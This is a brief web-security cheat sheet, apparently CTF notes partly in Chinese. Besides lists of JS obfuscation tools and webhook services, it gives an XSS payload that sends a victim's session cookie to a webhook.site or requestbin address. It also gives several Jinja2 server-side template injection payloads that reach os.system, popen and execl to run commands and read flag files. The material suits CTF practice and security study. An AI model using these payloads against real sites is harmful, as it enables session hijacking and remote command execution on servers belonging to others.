Web Cheat Sheet

Web Cheat Sheet

Online Tools

| Fuck | Beautifier | | ——————————– | ——————————– | | jsfuck | JSNice | |jjencode|JS 反混淆器: 可以反混淆或解密JS的檔案| |aaencode|JS 壓縮+加密+混淆+美化| |Esolang List|JS Fuck Decode| ||aadecode|

Cheat-Sheet

  • XSS-CheatSheet 利用XSS把session打到webhook上:
    1
    2
    3
      window.location=<requestbin.com>/?a+document.cookie
      // or
      fetch("https://webhook.site/699a6563-c9b5-4ad7-adaa-e189c5f78194", { method: 'GET', headers: { 'Cookie': document.cookie } })
    
  • All-Injection
  • SSTI Payload: 記得找==os._wrap_close==
    1
    2
    3
    4
    5
    6
      {{().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('id')}}
      {{self.__init__.__globals__.__builtins__.__import__("os").popen("cat%20Flag.txt").read()}}
      {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['execl']("/bin/cat", "cat", "./flag.txt")}}
      {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['popen']("cat /flag.txt")}}
      {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['execl']("/bin/cat", "cat", file.lower())}}
      {{().__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['spawnl']('P_WAIT', "/bin/cat", "cat", file.lower())}}
    

Others

  • wasm → c: wabt
      # 安裝Cmake,所有過程一定要用WSL
      $ mkdir build && cd build
      $ cmake ..
      $ cmake --build .
      # 按照說明build完後進到./build
      $ ./wasm2c {wasm file path} -o {output c file path}
    
  • Webhook Webhook.site Beeceptor Ngrok